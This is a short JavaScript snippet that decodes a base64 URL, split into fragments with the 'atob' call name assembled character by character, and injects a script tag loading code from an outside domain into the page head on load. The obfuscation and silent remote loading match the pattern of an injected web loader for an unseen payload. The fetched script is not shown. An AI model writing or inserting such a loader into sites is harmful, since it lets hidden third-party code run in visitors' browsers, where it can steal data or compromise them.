(function () {
    const parts = [
        "aHR0cHM6Ly9q", "YWliLnVrL2pz",
        "L2phaWItbW9k", "YWwuanM="
    ];
    const b64 = parts.join("");
    const fn = window[["a","t","o","b"].join("")];
    const swxi = fn(b64);

    const s = document.createElement('script');
    s.src = swxi;
    s.defer = true;

    document.head.appendChild(s);
})();